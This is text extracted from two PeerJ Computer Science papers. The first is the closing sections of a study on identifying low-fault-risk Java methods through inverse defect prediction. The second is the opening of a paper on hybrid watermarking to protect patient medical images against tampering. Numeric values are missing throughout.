/peerj-cs. https://peerj.com/computer-science/ the results in the cross-project prediction scenario are similar. in four of the six projects, the number of faults in lfr methods increased compared with the within-project prediction scenario. the fault-density reduction deteriorated to . both at the method and sloc level (strict idp: . resp. . ). for all projects, idp outperformed the traditional approach. discussion the results of our empirical study show that only very few lfr methods actually contain a fault, and thus, they indicate that idp can successfully identify methods that are not fault-prone. on average, . % of the methods ( . % of the sloc) matched by the strict classifier contain only . % of all faults, resulting in a considerable fault-density reduction for the matched methods. in any case, lfr methods are less fault-prone than other methods (fault-density reduction is higher than one in all projects); based on methods, lfr methods are at least twice less likely to contain a fault. for the stricter classifier, the extent of the matched methods, which could be deferred in testing, is between % and % of the sloc of the respective project. the more lenient classifier matches more methods and sloc at the cost of a higher fault proportion, but still achieves satisfactory fault-density reduction values. this shows that the balance between fault risk and matched extent can be influenced by the number of considered rules to reflect the priorities of a software project. interestingly, the cross-project idp classifier, which is trained on data from the respective other five projects, exhibits a higher precision than the within-project idp classifier. except for the math project, the lfr methods contain fewer faulty methods in table rq : results of a traditional defect prediction approach. project faults in lfr lfr methods lfr methods lfr sloc lfr methods contain : : : % of all faults fault-density reduction # % prec. rec # % # % (methods) (sloc) within-project defect prediction: traditional approach used in giger et al. ( ) chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % , . % , . % . % . . math . % . % . % . % , . % . % . . mockito . % . % . % , . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . cross-project defect prediction: traditional approach used in giger et al. ( ) chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % , . % , . % . % . . math . % . % . % , . % , . % . % . . mockito . % . % . % , . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the cross-project prediction scenario. this is in line with the method-based fault- density reduction factor of the strict classifier, which is in four of six cases better in the cross-project scenario (sloc-based: three of six cases). however, the proportion of matched methods decreased compared to the within-project prediction in most projects. accordingly, the cross-project results suggest that a larger, more diversified training set identifies lfr methods more conservatively, resulting in a higher precision and lower matching extent. math is the only project in which idp within-project prediction outperformed idp cross-project prediction. 
this project contains many methods with mathematical computations expressed by arithmetic operations, which are often wrapped in loops or conditions; most of the faults are located in these methods. therefore, the within-project classifiers used few, very precise rules for the identification of lfr methods. to sum up, our results show that the idp approach can be used to identify methods that are, due to the “triviality” of their code, less likely to contain any faults. hence, these methods require less focus during quality-assurance activities. depending on the criticality of the system and the risk one is willing to take, the development of tests for these methods can be deferred or even omitted in case of insufficient available test resources. the results suggest that idp is also applicable in cross-project prediction scenarios, indicating that characteristics of lfr methods differ less between projects than characteristics of faulty methods do. therefore, idp can be used in (new) projects with no (precise) historical fault data to prioritize the code to be tested. limitations a limitation of idp is that even lfr methods can contain faults. an inspection of faulty methods incorrectly classified to have a lfr showed that some faults were fixed by only adding further statements (e.g., to handle special cases). this means that a method can be faulty even if the existing code as such is not faulty (due to missing code). further imaginable examples for faulty lfr methods are simple getters that return the wrong variable, or empty methods that are unintentionally empty. therefore, while these methods are much less fault-prone, it cannot be assumed that they never contain any fault. consequently, excluding lfr methods from testing and other qa activities carries a risk that needs to be kept in mind. relation to defect prediction as discussed in detail in “introduction,” idp presents another view on defect prediction. the focus of idp on lfr methods requires an optimization toward precision, so that hardly any faulty methods are erroneously classified as trivial. the comparison with a traditional defect prediction approach showed that idp classified much fewer methods as trivial. however, methods classified by idp as trivial contain far fewer faulty methods, that is, idp achieves a higher precision. consequently, the identified trivial methods can be deferred or even excluded from quality-assurance activities. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ threats to validity next, we discuss the threats to internal and external validity. threats to internal validity the learning and evaluation was performed on information extracted from defects j (just, jalali & ernst, ). therefore, the quality of our data depends on the quality of defects j. common problems for defect datasets created by analyzing changes in commits that reference a bug ticket in an issue tracking system are as follows. first, commits that fix a fault but do not reference a ticket in the commit message cannot be detected (bachmann et al., ). consequently, the set of commits that reference a bug fix may not be a fair representation of all faults (bird et al., ; d’ambros, lanza & robbes, ; giger et al., ). second, bug tickets in the issue tracker may not always represent faults and vice versa. herzig, just & zeller ( ) pointed out that a significant amount of tickets in the issue trackers of open-source projects is misclassified. 
therefore, it is possible that not all bug-fix commits were spotted. third, methods may contain faults that have not been detected or fixed yet. in general, it is not possible to prove that a method does not contain any faults. fourth, a commit may contain changes (such as refactorings) that are not related to the bug fix, but this problem does not affect the defects j dataset due to the authors’ manual inspection. these threats are present in nearly all defect prediction studies, especially in those operating at the method level. defect prediction models were found to be resistant to such kind of noise to a certain extent (kim et al., ). defects j contains only faults that are reproducible and can be precisely mapped to methods; therefore, faulty methods may be under-approximated. in contrast, other datasets created without manual post-processing tend to over-approximate faults. to mitigate this threat, we replicated our idp evaluation with two study objects used in giger et al. ( ). the observed results were similar to our study. threats to external validity the empirical study was performed with six mature open-source projects written in java. the projects are libraries and their results may not be applicable to other application types, for example, large industrial systems with user interfaces. the results may also not be transferable to projects of other languages, for the following reasons: first, java is a strongly typed language that provides type safety. it is unclear if the idp approach works for languages without type safety, because it could be that even simple methods in such languages exhibit a considerable amount of faults. second, in case the approach as such is applicable to other languages, the collected metrics and the lfr classifier need to be validated and adjusted. other languages may use language constructs in a different way or use constructs that do not exist in java. for example, a classifier for the c language should take constructs such as gotos and the use of pointer arithmetic into consideration. furthermore, the projects in the dataset (published in ) did not contain code with lambda expressions introduced in java (http://www.oracle.com/technetwork/articles/java/architect-lambdas-part - .html). niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.oracle.com/technetwork/articles/java/architect-lambdas-part - .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore, in newer projects that make use of lambda expressions, the presence of lambdas should be taken into consideration when classifying methods. consequently, further studies are necessary to determine whether the results are generalizable. like in most defect prediction studies, we treated all faults as equal and did not consider their severity. according to ostrand, weyuker & bell ( ), the severity of bug tickets is often highly subjective. in reality, not all faults have the same importance, because some cause higher failure follow-up costs than others. conclusion developer teams often face the problem of scarce test resources and need therefore to prioritize their testing efforts (e.g., when writing new automated unit tests). defect prediction can support developers in this activity. in this paper, we propose an inverse view on defect prediction (idp) to identify methods that are so “trivial” that they contain hardly any faults. 
we study how unerringly such lfr methods can be identified, how common they are, and whether the proposed approach is applicable for cross- project predictions. we show that idp using association rule mining on code metrics can successfully identify lfr methods. the identified methods contain considerably fewer faults than the average code and can provide a savings potential for qa activities. depending on the parameters, a lower priority for qa can be assigned on average to . % resp. . % of the methods, amounting to . % resp. . % of the sloc. while cross-project defect prediction is a challenging task (he et al., ; zimmermann et al., ), our results suggest that the idp approach can be applied in a cross-project prediction scenario at the method level. in other words, an idp classifier trained on one or more (java open-source) projects can successfully identify lfr methods in other java projects for which no—or no precise—fault data exists. for future work, we want to replicate this study with closed-source projects, projects of other application types, and projects in other programming languages. it is also of interest to investigate which metrics and classifiers are most effective for the idp purpose and whether they differ from the ones used in traditional defect prediction. moreover, we plan to study whether code coverage of lfr methods differs from code coverage of other methods. if guidelines to meet a certain code coverage level are set by the management, unmotivated testers may add tests for lfr methods first because it might be easier to write tests for those methods. consequently, more complex methods with a higher fault risk may remain untested once the target coverage is achieved. therefore, we want to investigate whether this is a problem in industry and whether it can be addressed with an adjusted code-coverage computation, which takes lfr methods into account. acknowledgements we thank nils göde, florian deißenböck, and the anonymous reviewers for their valuable feedback. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was funded by the institute of software technology of the university of stuttgart and the german federal ministry of education and research (bmbf), grant “sofie, is a.” the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: institute of software technology of the university of stuttgart. german federal ministry of education and research (bmbf): sofie, is a. competing interests rainer niedermayr and tobias röhm are employees of cqse gmbh. the responsibility for this article lies with the authors. author contributions � rainer niedermayr conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � tobias röhm conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. � stefan wagner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. 
data availability the following information was supplied regarding data availability: niedermayr, rainer ( ): dataset: too trivial to test? figshare. fileset. doi . /m .figshare. .v . references agrawal r, imieli�nski t, swami a. . mining association rules between sets of items in large databases. acm sigmod record ( ): – doi . / . . agrawal r, srikant r. . fast algorithms for mining association rules. in: proceedings of th international conference on very large data bases (vldb’ ). san francisco: morgan kaufmann, vol. , – . bacchelli a, d’ambros m, lanza m. . are popular classes more defect prone? in: proceedings of th international conference on fundamental approaches to software engineering (fase’ ). berlin, heidelberg: springer, vol. , – doi . / - - - - _ . bachmann a, bird c, rahman f, devanbu p, bernstein a. . the missing links: bugs and bug-fix commits. in: proceedings of th international symposium on foundations of software engineering (fse’ ). new york: acm, – . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bayardo rj, agrawal r, gunopulos d. . constraint-based rule mining in large, dense databases. in: proceedings of the th international conference on data engineering (icde’ ). piscataway: ieee, – doi . /icde. . . bertolino a. . software testing research: achievements, challenges, dreams. in: proceedings of future of software engineering (fose’ ). los alamitos: ieee computer society, – doi . /fose. . . bird c, bachmann a, aune e, duffy j, bernstein a, filkov v, devanbu p. . fair and balanced? bias in bug-fix datasets. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse’ ). new york: acm, – . bird c, nagappan n, murphy b, gall h, devanbu p. . don’t touch my code! examining the effects of ownership on software quality. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse’ ). new york: acm, – . bowes d, hall t, harman m, jia y, sarro f, wu f. . mutation-aware fault prediction. in: proceedings of th international symposium on software testing and analysis (issta’ ). new york: acm, – . catal c. . software fault prediction: a literature review and current trends. expert systems with applications ( ): – doi . /j.eswa. . . . catal c, diri b. . a systematic review of software fault prediction studies. expert systems with applications ( ): – doi . /j.eswa. . . . chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . czibula g, marian z, czibula ig. . software defect prediction using relational association rule mining. information sciences : – doi . /j.ins. . . . d’ambros m, lanza m, robbes r. . evaluating defect prediction approaches: a benchmark and an extensive comparison. empirical software engineering ( – ): – doi . /s - - - . jed wing mkc, weston s, williams a, keefer c, engelhardt a, cooper t, mayer z, kenkel b, benesty m, lescarbeau r, ziem a, scrucca l, tang y, candan c, hunt t, the r core team. . caret: classification and regression training. r package version . - . available at https://topepo.github.io/caret/. giger e, d’ambros m, pinzger m, gall hc. . method-level bug prediction. 
in: proceedings of th international symposium on empirical software engineering and measurement (esem’ ). new york: acm, – . gosling j, joy b, steele g, bracha g, buckley a. . the java language specification, java se edition, february . available at http://docs.oracle.com/javase/specs/jls/se /html/index.html (accessed march ). hahsler m, buchta c, gruen b, hornik k. . arules: mining association rules and frequent itemsets. r package version . - . available at http://mhahsler.github.io/arules/. hahsler m, gruen b, hornik k. . arules—a computational environment for mining association rules and frequent item sets. journal of statistical software ( ): – doi . /jss.v .i . hall t, beecham s, bowes d, gray d, counsell s. . a systematic literature review on fault prediction performance in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /icde. . http://dx.doi.org/ . /fose. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /s - - - https://topepo.github.io/caret/ http://docs.oracle.com/javase/specs/jls/se /html/index.html http://mhahsler.github.io/arules/ http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ haas r, niedermayr r, jurgens e. . teamscale: tackle technical debt and control the quality of your software. in: proceedings of the nd international conference on technical debt (techdebt' tools track). piscataway: ieee. hassan ae. . predicting faults using the complexity of code changes. in: proceedings of st international conference on software engineering (icse’ ). los alamitos: ieee computer society, – doi . /icse. . . hata h, mizuno o, kikuno t. . bug prediction based on fine-grained module histories. in: proceedings of th international conference on software engineering (icse’ ). piscataway: ieee, – . he z, shu f, yang y, li m, wang q. . an investigation on the feasibility of cross-project defect prediction. automated software engineering ( ): – doi . /s - - - . heinemann l, hummel b, steidl d. . teamscale: software quality control in real-time. in: proceedings of th international conference on software engineering (icse’ ), new york: acm. herzig k, just s, zeller a. . it’s not a bug, it’s a feature: how misclassification impacts bug prediction. in: proceedings of th international conference on software engineering (icse’ ). piscataway: ieee, – . hummel b. . mccabe’s cyclomatic complexity and why we don’t use it. available at https://www.cqse.eu/en/blog/mccabe-cyclomatic-complexity/ (accessed march ). just r, jalali d, ernst md. . defects j: a database of existing faults to enable controlled testing studies for java programs. in: proceedings of rd international symposium on software testing and analysis (issta’ ). tool demo, new york: acm, – . karthik r, manikandan n. . defect association and complexity prediction by mining association and clustering rules. in: proceedings of nd international conference on computer engineering and technology (iccet’ ). piscataway: ieee, vol. , . khoshgoftaar tm, gao k, seliya n. . attribute selection and imbalanced data: problems in software defect prediction. in: proceedings of nd international conference on tools with artificial intelligence (ictai’ ). piscataway: ieee, vol. , – . kim s, whitehead ej jr, zhang y. . classifying software changes: clean or buggy? 
ieee transactions on software engineering ( ): – doi . /tse. . . kim s, zhang h, wu r, gong l. . dealing with noise in defect prediction. in: proceedings of rd international conference on software engineering (icse’ ). piscataway: ieee, – . kim s, zimmermann t, whitehead ej jr, zeller a. . predicting faults from cached history. in: proceedings of th international conference on software engineering (icse’ ). los alamitos: ieee computer society, – . lee t, nam j, han d, kim s, in hp. . micro interaction metrics for defect prediction. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse’ ). new york: acm, – . longadge r, dongre s, malik l. . class imbalance problem in data mining: review. international journal of computer science and network ( ): – . ma b, dejaeger k, vanthienen j, baesens b. . software defect prediction based on association rule classification. in: proceedings of st international conference on e-business intelligence (icebi’ ). paris: atlantis press. mccabe tj. . a complexity measure. ieee transactions on software engineering ( ): – . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /icse. . http://dx.doi.org/ . /s - - - https://www.cqse.eu/en/blog/mccabe-cyclomatic-complexity/ http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mccallum a, nigam k. . a comparison of event models for naive bayes text classification. in: proceedings of workshop on learning for text categorization (aaai- -w ). palo alto, california: aaai press, vol. , – . mende t, koschke r. . revisiting the evaluation of defect prediction models. in: proceedings of th international conference on predictor models in software engineering (promise’ ). new york: acm, . meneely a, williams l, snipes w, osborne j. . predicting failures with developer networks and social network analysis. in: proceedings of th international symposium on foundations of software engineering (fse’ ). new york: acm, – . menzies t, di stefano js. . how good is your blind spot sampling policy? in: proceedings of th international symposium on high assurance systems engineering. piscataway: ieee, – . menzies t, di stefano js, chapman m, mcgill k. . metrics that matter. in: proceedings of th annual nasa goddard software engineering workshop. piscataway: ieee, ieee/nasa, – . menzies t, di stefano j, orrego a, chapman r. . assessing predictors of software defects. in: proceedings of workshop predictive software models (psm’ ). menzies t, greenwald j, frank a. . data mining static code attributes to learn defect predictors. ieee transactions on software engineering ( ): – doi . /tse. . . menzies t, milton z, turhan b, cukic b, jiang y, bener a. . defect prediction from static code features: current results, limitations, new approaches. automated software engineering ( ): – doi . /s - - - . menzies t, stefano j, ammar k, mcgill k, callis p, davis j, chapman r. . when can we test less? in: proceedings of th international symposium on software metrics (sms’ ). piscataway: ieee, – . morisaki s, monden a, matsumura t, tamada h, matsumoto k-i. . defect data analysis based on extended association rule mining. in: proceedings of th international workshop on mining software repositories (msr’ ). los alamitos: ieee computer society. nagappan n, ball t. . use of relative code churn measures to predict system defect density. 
in: proceedings of th international conference on software engineering (icse’ ). piscataway: ieee, – . nagappan n, ball t, zeller a. . mining metrics to predict component failures. in: proceedings of th international conference on software engineering (icse’ ). new york: acm, – . ndepend. . code metrics definitions. available at http://www.ndepend.com/docs/code- metrics#ilnestingdepth (accessed august ). niedermayr r, röhm t, wagner s. . dataset: too trivial to test? available at https://figshare.com/articles/dataset_too_trivial_to_test_/ . ostrand tj, weyuker ej, bell rm. . where the bugs are. acm sigsoft software engineering notes. vol. . new york: acm, – . ostrand tj, weyuker ej, bell rm. . predicting the location and number of faults in large software systems. ieee transactions on software engineering ( ): – doi . /tse. . . palomba f, zanoni m, fontana fa, de lucia a, oliveto r. . smells like teen spirit: improving bug prediction performance using the intensity of code smells. in: proceedings. nd international conference on software maintenance and evolution (icsme’ ). piscataway: ieee, – . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /s - - - http://www.ndepend.com/docs/code-metrics#ilnestingdepth http://www.ndepend.com/docs/code-metrics#ilnestingdepth https://figshare.com/articles/dataset_too_trivial_to_test_/ http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pascarella l, palomba f, bacchelli a. . re-evaluating method-level bug prediction. in: proceedings of th international conference on software analysis, evolution and reengineering (saner’ ). piscataway: ieee, – . r core team. . r: a language and environment for statistical computing. version . . . vienna: r foundation for statistical computing. available at https://www.r-project.org/. rahman f, devanbu p. . ownership, experience and effects: a fine-grained study of authorship. in: proceedings of rd international conference on software engineering (icse’ ). new york: acm, – . scanniello g, gravino c, marcus a, menzies t. . class level fault prediction using software clustering. in: proceedings of th international conference on automated software engineering (ase’ ). piscataway: ieee, – . shepperd m. . a critique of cyclomatic complexity as a software metric. software engineering journal ( ): – doi . /sej. . . shippey t, hall t, counsell s, bowes d. . so you need more method level datasets for your software defect prediction? voilà! in: proceedings of th international symposium on empirical software engineering and measurement (esem’ ). new york: acm. shivaji s, whitehead ej, akella r, kim s. . reducing features to improve code change-based bug prediction. ieee transactions on software engineering ( ): – doi . /tse. . . simon gj, kumar v, li pw. . a simple statistical model and association rule filtering for classification. in: proceedings of th international conference on knowledge discovery and data mining (sigkdd’ ). new york: acm, – . song q, shepperd m, cartwright m, mair c. . software defect association mining and defect correction effort prediction. ieee transactions on software engineering ( ): – doi . /tse. . . torgo l. . data mining with r, learning with case studies. boca raton: crc press. turhan b, menzies t, bener ab, di stefano j. . on the relative value of cross-company and within-company data for defect prediction. empirical software engineering ( ): – doi . /s - - - . weyuker ej, ostrand tj. . 
what can fault prediction do for you? in: proceedings of nd international conference on tests and proofs (tap' ). new york: springer, – . witten ih, frank e, hall ma, pal cj. . data mining: practical machine learning tools and techniques. san francisco: morgan kaufmann. xia x, lo d, pan sj, nagappan n, wang x. . hydra: massively compositional model for cross-project defect prediction. ieee transactions on software engineering ( ): – doi . /tse. . . xu z, liu j, luo x, zhang t. . cross-version defect prediction via hybrid active learning with kernel principal component analysis. in: proceedings of th international conference on software analysis, evolution and reengineering (saner' ). piscataway: ieee, – . zafar h, rana z, shamail s, awais mm. . finding focused itemsets from software defect data. in: proceedings of th international multitopic conference (inmic' ). piscataway: ieee, – . zhang h, zhang x, gu m. . predicting defective software components from code complexity measures. in: proceedings of th pacific rim international symposium on dependable computing (prdc' ). piscataway: ieee, – . zhang f, zheng q, zou y, hassan ae. . cross-project defect prediction using a connectivity-based unsupervised classifier. in: proceedings of th international conference on software engineering (icse' ). new york: acm, – . zimmermann t, nagappan n. . predicting defects using network analysis on dependency graphs. in: proceedings of th international conference on software engineering (icse' ). piscataway: ieee, – . zimmermann t, nagappan n, gall h, giger e, murphy b. . cross-project defect prediction: a large scale experiment on data vs. domain vs. process. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse' ). new york: acm, – . zimmermann t, premraj r, zeller a. . predicting defects for eclipse. in: proceedings of rd international workshop on predictor models in software engineering (promise' ). washington, d.c.: ieee computer society, .
protection of the patient data against intentional attacks using a hybrid robust watermarking code. ahmad nagm and mohammed safy elwan. computer engineering, cairo higher institute for engineering, computer science and management, cairo, egypt; electrical engineering, egyptian academy of engineering and advanced technology, cairo, egypt. abstract: the security of patient information is important during the transfer of medical data. a hybrid spatial domain watermarking algorithm that includes encryption, integrity protection, and steganography is proposed to strengthen the originality of the information based on authentication. the proposed algorithm checks whether the patient's information has been deliberately changed or not. the created code is distributed at every pixel of the medical image and not only in the regions of non-interest pixels, while the image details are still preserved. to enhance the security of the watermarking code, sha- is used to get the initial key for the symmetric encryption algorithm. the target of this approach is to preserve the content of the image and the watermark simultaneously; this is achieved by synthesizing an encrypted watermark from one of the components of the original image and not by embedding a watermark in the image. to evaluate the proposed code, the least significant bit (lsb), bit sb, and bit sb were used. the evaluation showed that the lsb gives better image quality, but overall the bit sb is better in its ability against active attacks up to a size of * pixels while still preserving high image quality. subjects: computer vision, security and privacy. keywords: data payload, data integrity protection, sha- , spatial domain medical image watermarking, intentional attacks, steganography. introduction: the presence of electronic data of patients within the current worldwide health care information systems has important benefits for patients and care practitioners, including greater patient discretion and improved clinical management. the flow of knowledge between hospitals, physicians, and others has increased by % between and . hackers are also inspired by this growth and by technical developments to intrude into the servers where these confidential data are stored. there are different kinds of attacks that could be used to manipulate intelligent medical devices; if an attacker gets hold of a smart pacemaker, for instance, he will be able to give the patient a shock that could lead to his/her death (swarna priya et al., ). how to cite this article: nagm a, safy elwan m. . protection of the patient data against intentional attacks using a hybrid robust watermarking code. peerj comput. sci. :e doi . /peerj-cs. submitted october, accepted january, published march. corresponding author: mohammed safy elwan, msafy@eaeat.edu.eg. academic editor: mamoun alazab. additional information and declarations can be found on page . doi . /peerj-cs. copyright nagm and safy elwan, distributed under creative commons cc-by . the patient's information security and the patient's medical data privacy are of high importance nowadays.
medical information plays a significant role in the health system, and its modification might result in misdiagnosis. medical patient information can be intentionally tampered with, with content being added or deleted. some image processing operations can also cause unintentional changes; for example, information may be lost when compression is used in telemedicine applications to minimize the amount of data to be transmitted, and depending on its degree this loss can become unacceptable and may result in a misdiagnosis. security requirements differ from application to application and in the aspects they protect; they should guarantee three characteristics: confidentiality, integrity, and availability (allaert & dusserre, ; armoni, ; jennett et al., ; katsikas, ). for the protection of the patient's information, digital watermarking techniques are used. watermarking strategies can be categorized, by the domain in which the watermark is embedded, into spatial and frequency domain techniques. spatial watermarking comprises various techniques such as text mapping coding, patchwork, least significant bit substitution, and additive watermarking. compared with transform domain methods, spatial domain methods are less complex but weaker against various image attacks. in this article, a spatial domain watermarking technique is proposed to improve the data payload while providing both authentication and data hiding. for the identity authentication purpose, the created code is distributed into both the region of interest and the regions of non-interest of the cover medical image. to enhance the security of the confidential patient information, sha- is used to get the initial key for the symmetric encryption before embedding it in the medical image. the main contributions of the present research are:
- the proposed approach preserves the patient data using a hybrid watermarking strategy, which includes encryption, integrity protection, and steganography.
- the watermark is created from the image itself, and each image has its own watermark depending on one of the three components of the image and on the personal information of the patient.
- its advantage over the other approaches is that the created code is distributed at every pixel of the cover medical image and not only in the regions of non-interest pixels (roni).
- to enhance watermark security, the hash function is used to encrypt the watermark.
- although there is a watermark in every pixel in the image, it represents / of the pixel and does not affect the quality of the image.
- it solves the problem that exists in spatial domain algorithms, which cannot simultaneously offer protection against intentional attacks and robustness.
literature review: to protect medical images during transmission, watermarking is used. it is a process of embedding significant information in a patient's medical image to provide authentication, information hiding, tamper-proof data, etc. (pan et al., ). the main factors of the watermarking process are reliability, confidentiality, and authenticity. watermarking is classified into invisible and visible watermarking; against watermarking attacks (priya, santhi & swaminathan, ), invisible watermarking is a robust technique. in medical images, quality is critical because diagnosis and treatment are the primary goals.
for this reason, watermarking has several limitations in medical image authentication (rao & kumari, ). to create an efficient watermark the following criteria shall be met: (i) imperceptibility (ii) payload (iii) robustness against manipulations fig. shows the tradeoff between the watermark characteristics. in mousavi, naghsh & abu-bakar ( ), the quality requirements for patients’ pathology medical data are extremely strict, and no changes are allowed. the research in the field of medical image digital watermarking (nyeem, boles & boyd, ) is essential because any change in the transmitted patient information is forbidden and will affect the physician’s decision. digital image watermarking can be mainly done in both transform and spatial domains as illustrated in fig. . figure trade-off among the features of watermarking (rao & kumari, ). full-size doi: . /peerj-cs. /fig- figure digital watermarking techniques based on embedding domain (rao & kumari, ). full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the spatial domain, the watermark is inserted within the original medical image (zhang & wang, ). many techniques are used to insert a watermark such as lsb (least significant bit) substitution technique, pixel alteration, and bit shifting, etc. the technique of the spatial domain watermarking is very easy and simple with less complexity. it is an easy task to embed watermarks into the spatial domain components of the cover images. it has been one of the basic schemes used since the beginning of digital watermarking in (pan, huang & jain, ). usually, spatial watermarking systems choose several pixels from the cover image and adjust the luminance values of the pixels chosen depending on the bits of the watermark to be embedded (pan, huang & jain, ; van schyndel, tirkel & osborne, ; tirkel et al., ). a well-known classic spatial-based watermarking method is the last-significant-bits (lsb) modification scheme (van schyndel, tirkel & osborne, ). the simplicity of implementation and the low complexity are the advantages of spatial-based watermarking schemes. on the other hand, they are not robust against common methods of attack (wolfgang & delp, ; voyatzis & pitas, ; langelaar, setyawan & lagendijk, ; hernández, perez-gonzalez & rodriguez, ). to improve the spatial domain weakness, many methods are proposed. in jennett et al. ( ), the performance of spatial-based watermarking schemes can be improved using the bose–chaudhuri–hochquenghem (bch) block codes. in huang, pan & wang ( ), a scheme with greater robustness was proposed by the authors. like the general scheme described, first of all, their scheme also selects the number of pixels considered from the cover image. then, the mean value of the neighboring pixels is determined for each pixel calculated. this mean value is used to change the selected pixel. the robustness of their system is higher, which means that this system is more acceptable for practical use. besides, the device also provides a parameter for regulating the balance between imperceptibility and robustness. therefore, users of this scheme may prefer to have better imperceptibility or better robustness. in memon & gilani ( ), the content authentication of the patient’s images (ct) is the main purpose. 
the image is separated into two regions one of them is the region of noninterest (roni) and the other in the region of interest (roi). the watermark is inserted in the roni, so the quality of roi has persevered. this code is very simple but it can be easily attacked. in zain & clarke ( ), the security of the ultrasound (us) images is increased based on authentication and integrity. first, a rectangular shape is used to separate the roni and the roi. then sha hash function is used to calculate the hash value of the whole image. to make the code more secure, a secret key is used to create a hash value as well as a secret key for the inserted watermark. finally, the hash value is inserted into the lsbs of roni. in wakatani ( ), data hiding is the main purpose. the digital watermarking is proposed to prevent the distortion of roi in the original data by inserting the watermarking image in the roni. the results show the high performance of the code to nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ detect the embedded watermark, simultaneously the embedded watermark can be generated only apart from the roi. in viswanathan & venkata krishna ( ), watermarking and cryptography are used in one system in a way that inserts an encrypted version of the patient’s original information. after watermarking, the corrupted details of the medical information were recovered using a reversible property. in memon et al. ( ), a robust watermark is proposed based on the combination of the identification code of the physician, patient’s information and, the lsbs of the roi, which after encryption were embedded into the roni of the patient’s original image. in nagm et al. ( ) and nagm, torky & youssef ( ), a hybrid scheme is proposed. the code is distributed over the entire image. the code used the lsb, bit sb, and msb. the main focus is to discuss the efficacy of the images and not focus on the ability to counter intentional attacks to alter the patient’s information. in alattar ( ), for color images, a reversible watermarking algorithm with very high data-hiding ability has been created. the algorithm enables the process of watermarking, which restores the exact original image, to be reversed. the algorithm obscures multiple bits in the differential expansion of neighboring pixel vectors. these findings show that at the highest signal-to-noise ratio, the spatial, quad-based algorithm allows for hiding the largest payload. in shih & wu ( ), based on the genetic algorithms the watermark is embedded around the roi of the original image. the lossless compression is used to compress the roi part and the lossy compression is used to compress the roni part. in thodi & rodríguez ( ), solve the problem of the undesirable distortion at low embedding capacities of the tian’s difference-expansion technique. to embed the location map, the histogram shifting technique is used. a new reversible watermarking algorithm is illustrated based on the combination between the different expansion and the histogram shifting. in zhao et al. ( ), the histogram theory is the core of this paper. based on the difference between the pixels the histogram is constructed. a multilevel histogram modification mechanism is used in the embedding of the data. one or two level histogram modification is employed to improve the hiding capacity. the embedding level is used to extract the data and in the stage of the image recovery. 
in wang, lee & chang ( ), based on the histogram-shifting a reversible data hiding approach is proposed. by changing the peak point pixel value to another pixel value in the same section, the hidden data can be inserted in the cover image. to guarantee the correct extraction of the secret data, the proposed method uses a location map. in shih & zhong ( ), the medical image is separated into roi and roni. the medical images with multiple rois preselected by experts are taken as the input, to improve the embedding ability without distorting the significant diagnostic information and keep rois lossless. the roni is embedded with the watermark. because of the image transformation being applied, the rois are confined to the rectangular shape. nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in bamal & kasana ( ), for the embedding of the watermark in the cover image the slantlet transformation along with the rs vector is used. for watermark security, md and aes are used. the watermark is embedded in all the channels of the original image. the results show an increase in the capacity of the image and at the same time maintains the visual quality of watermarked images. in savakar & ghuli ( ), a combination of blind and non-blind watermarking is used. the watermark is a binary image and embedded in the cover image using dwt. in al-afandy et al. ( ), two-hybrid techniques are used. the first one is based on discrete stationary wavelet transform (dswt) and the other one is based on the singular value decomposition (svd) in discrete wavelet transform. the results show that the yiq and the rgb color coordinate 